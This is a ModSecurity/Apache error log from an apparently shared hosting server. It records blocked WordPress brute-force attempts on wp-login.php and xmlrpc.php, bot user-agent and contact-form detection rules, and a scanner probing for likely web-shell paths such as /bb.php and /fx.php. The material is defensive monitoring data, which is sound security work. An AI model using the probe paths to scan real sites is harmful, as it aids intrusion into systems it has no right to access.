[Tue May 26 13:01:14.941971 2026] [security2:error] [pid 470766:tid 470992] [client 138.2.67.134:44828] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMQujO_W1DqEcFHQ7oBQAAAGA"]
[Tue May 26 13:01:15.393738 2026] [security2:error] [pid 470766:tid 470998] [client 78.46.215.1:52006] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVMQujO_W1DqEcFHQ7oBAAAAGY"], referer: https://thegoodsporting.com
[Tue May 26 13:01:15.556586 2026] [security2:error] [pid 470766:tid 470992] [client 138.2.67.134:44828] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMQujO_W1DqEcFHQ7oBQAAAGA"]
[Tue May 26 13:01:15.849124 2026] [security2:error] [pid 470766:tid 470979] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMQ-jO_W1DqEcFHQ7oFgAAAFM"]
[Tue May 26 13:01:15.988128 2026] [proxy:error] [pid 470766:tid 471006] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:01:15.988190 2026] [proxy_http:error] [pid 470766:tid 471006] [client 104.28.222.46:33333] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:01:15.989043 2026] [proxy:error] [pid 470766:tid 471006] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:01:15.989082 2026] [proxy_http:error] [pid 470766:tid 471006] [client 104.28.222.46:33333] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:01:17.135007 2026] [proxy:error] [pid 470766:tid 470909] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:01:17.135102 2026] [proxy_http:error] [pid 470766:tid 470909] [client 104.28.222.46:28068] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:01:17.135768 2026] [proxy:error] [pid 470766:tid 470909] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:01:17.135834 2026] [proxy_http:error] [pid 470766:tid 470909] [client 104.28.222.46:28068] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:01:18.071910 2026] [security2:error] [pid 470766:tid 470842] [remote 88.198.91.116:52200] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.91.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahVMRejO_W1DqEcFHQ7oUwAADks"]
[Tue May 26 13:01:18.299822 2026] [security2:error] [pid 470766:tid 470974] [client 14.234.188.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMRejO_W1DqEcFHQ7oUgAAAE4"]
[Tue May 26 13:01:18.377180 2026] [security2:error] [pid 470766:tid 470841] [remote 47.128.98.218:12594] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "grandconclaveindia.org.in"] [uri "/gci-ranks-past.php"] [unique_id "ahVMRujO_W1DqEcFHQ7oXgAAQEo"]
[Tue May 26 13:01:18.551444 2026] [security2:error] [pid 470766:tid 470918] [client 138.2.67.134:44838] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMRujO_W1DqEcFHQ7oXwAAABY"]
[Tue May 26 13:01:19.003980 2026] [security2:error] [pid 470766:tid 470954] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMRujO_W1DqEcFHQ7oYgAAADo"]
[Tue May 26 13:01:19.177089 2026] [security2:error] [pid 470766:tid 470918] [client 138.2.67.134:44838] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMRujO_W1DqEcFHQ7oXwAAABY"]
[Tue May 26 13:01:21.609317 2026] [security2:error] [pid 470766:tid 470989] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMSejO_W1DqEcFHQ7okAAAAF0"]
[Tue May 26 13:01:22.099897 2026] [security2:error] [pid 470766:tid 471013] [client 138.2.67.134:44844] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMSujO_W1DqEcFHQ7oowAAAHU"]
[Tue May 26 13:01:22.720963 2026] [security2:error] [pid 470766:tid 471013] [client 138.2.67.134:44844] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMSujO_W1DqEcFHQ7oowAAAHU"]
[Tue May 26 13:01:23.585472 2026] [security2:error] [pid 470766:tid 470937] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMS-jO_W1DqEcFHQ7ouwAAACk"]
[Tue May 26 13:01:24.470370 2026] [security2:error] [pid 470766:tid 470947] [client 4.201.75.230:5334] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/bb.php"] [unique_id "ahVMTOjO_W1DqEcFHQ7o0wAAADM"]
[Tue May 26 13:01:25.368236 2026] [security2:error] [pid 470766:tid 471022] [client 138.2.67.134:10786] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMTejO_W1DqEcFHQ7o5AAAAH4"]
[Tue May 26 13:01:25.496683 2026] [security2:error] [pid 470766:tid 470948] [client 157.20.138.61:58092] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMTejO_W1DqEcFHQ7o5QAAADQ"]
[Tue May 26 13:01:25.496920 2026] [security2:error] [pid 470766:tid 470948] [client 157.20.138.61:58092] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMTejO_W1DqEcFHQ7o5QAAADQ"]
[Tue May 26 13:01:25.998061 2026] [security2:error] [pid 470766:tid 471022] [client 138.2.67.134:10786] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMTejO_W1DqEcFHQ7o5AAAAH4"]
[Tue May 26 13:01:26.676042 2026] [security2:error] [pid 470766:tid 470928] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMTujO_W1DqEcFHQ7pBAAAACA"]
[Tue May 26 13:01:26.911254 2026] [security2:error] [pid 470766:tid 470864] [remote 211.23.68.235:19227] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahVMTujO_W1DqEcFHQ7pEQAAKmE"]
[Tue May 26 13:01:28.869987 2026] [security2:error] [pid 470766:tid 470967] [client 4.201.75.230:5322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/222.php"] [unique_id "ahVMUOjO_W1DqEcFHQ7pQAAAAEc"]
[Tue May 26 13:01:29.204297 2026] [security2:error] [pid 470766:tid 470965] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMUOjO_W1DqEcFHQ7pOgAAAEU"]
[Tue May 26 13:01:29.291708 2026] [security2:error] [pid 470766:tid 471018] [client 138.2.67.134:10794] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMUejO_W1DqEcFHQ7pRAAAAHo"]
[Tue May 26 13:01:29.992137 2026] [security2:error] [pid 470766:tid 471018] [client 138.2.67.134:10794] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMUejO_W1DqEcFHQ7pRAAAAHo"]
[Tue May 26 13:01:29.992198 2026] [security2:error] [pid 470766:tid 471018] [client 138.2.67.134:10794] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMUejO_W1DqEcFHQ7pRAAAAHo"]
[Tue May 26 13:01:32.081654 2026] [security2:error] [pid 470766:tid 471005] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMU-jO_W1DqEcFHQ7pdQAAAG0"]
[Tue May 26 13:01:33.380267 2026] [proxy:error] [pid 470766:tid 470981] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:01:33.380341 2026] [proxy_http:error] [pid 470766:tid 470981] [client 104.28.222.46:63213] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:01:33.381289 2026] [proxy:error] [pid 470766:tid 470981] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:01:33.381335 2026] [proxy_http:error] [pid 470766:tid 470981] [client 104.28.222.46:63213] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:01:34.398103 2026] [security2:error] [pid 470766:tid 470968] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMVejO_W1DqEcFHQ7ptAAAAEg"]
[Tue May 26 13:01:34.625185 2026] [security2:error] [pid 470766:tid 470950] [client 138.2.67.134:10798] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMVujO_W1DqEcFHQ7pvQAAADY"]
[Tue May 26 13:01:35.244729 2026] [security2:error] [pid 470766:tid 470950] [client 138.2.67.134:10798] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMVujO_W1DqEcFHQ7pvQAAADY"]
[Tue May 26 13:01:35.938269 2026] [security2:error] [pid 470766:tid 471006] [client 157.20.138.61:58449] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMV-jO_W1DqEcFHQ7p5AAAAG4"]
[Tue May 26 13:01:35.938411 2026] [security2:error] [pid 470766:tid 471006] [client 157.20.138.61:58449] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMV-jO_W1DqEcFHQ7p5AAAAG4"]
[Tue May 26 13:01:37.162021 2026] [security2:error] [pid 470766:tid 470923] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMWOjO_W1DqEcFHQ7p-wAAABs"]
[Tue May 26 13:01:37.719411 2026] [security2:error] [pid 470766:tid 470798] [remote 18.209.220.99:31141] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.220.209.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahVMWejO_W1DqEcFHQ7qBgAADB8"]
[Tue May 26 13:01:38.244885 2026] [security2:error] [pid 470766:tid 470998] [client 138.2.67.134:59334] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMWujO_W1DqEcFHQ7qGQAAAGY"]
[Tue May 26 13:01:38.452929 2026] [security2:error] [pid 470766:tid 470797] [remote 147.47.107.157:45130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 157.107.47.147.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVMWujO_W1DqEcFHQ7qGgAAMh4"]
[Tue May 26 13:01:38.850546 2026] [security2:error] [pid 470766:tid 470998] [client 138.2.67.134:59334] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMWujO_W1DqEcFHQ7qGQAAAGY"]
[Tue May 26 13:01:38.870553 2026] [security2:error] [pid 470766:tid 470902] [client 4.201.75.230:5374] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/test1.php"] [unique_id "ahVMWujO_W1DqEcFHQ7qLgAAAAY"]
[Tue May 26 13:01:38.935271 2026] [security2:error] [pid 470766:tid 470907] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMWujO_W1DqEcFHQ7qIgAAAAs"]
[Tue May 26 13:01:40.788479 2026] [security2:error] [pid 470766:tid 470784] [remote 5.189.189.33:38818] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.189.189.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVMXOjO_W1DqEcFHQ7qWQAABBE"]
[Tue May 26 13:01:40.826375 2026] [security2:error] [pid 470766:tid 471008] [client 4.201.75.230:5370] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/css/autoload_classmap.php"] [unique_id "ahVMXOjO_W1DqEcFHQ7qXQAAAHA"]
[Tue May 26 13:01:40.879549 2026] [security2:error] [pid 470766:tid 470806] [remote 46.101.217.74:46940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.217.101.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVMXOjO_W1DqEcFHQ7qWAAAYic"]
[Tue May 26 13:01:41.536786 2026] [security2:error] [pid 470766:tid 471006] [client 138.2.67.134:59336] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMXejO_W1DqEcFHQ7qcQAAAG4"]
[Tue May 26 13:01:41.680485 2026] [security2:error] [pid 470766:tid 471022] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMXejO_W1DqEcFHQ7qbAAAAH4"]
[Tue May 26 13:01:41.762003 2026] [security2:error] [pid 470766:tid 470932] [client 165.140.119.146:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVMXejO_W1DqEcFHQ7qdAAAACQ"], referer: https://www.bloggertarget.com
[Tue May 26 13:01:41.815416 2026] [security2:error] [pid 470766:tid 470910] [client 4.201.75.230:5312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/fx.php"] [unique_id "ahVMXejO_W1DqEcFHQ7qfAAAAA4"]
[Tue May 26 13:01:42.130067 2026] [security2:error] [pid 470766:tid 471006] [client 138.2.67.134:59336] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMXejO_W1DqEcFHQ7qcQAAAG4"]
[Tue May 26 13:01:42.574579 2026] [security2:error] [pid 470766:tid 470921] [client 66.249.64.170:49735] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVMXejO_W1DqEcFHQ7qbQAAABk"], referer: https://doyecpa.com/prizes/227684965%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20class=
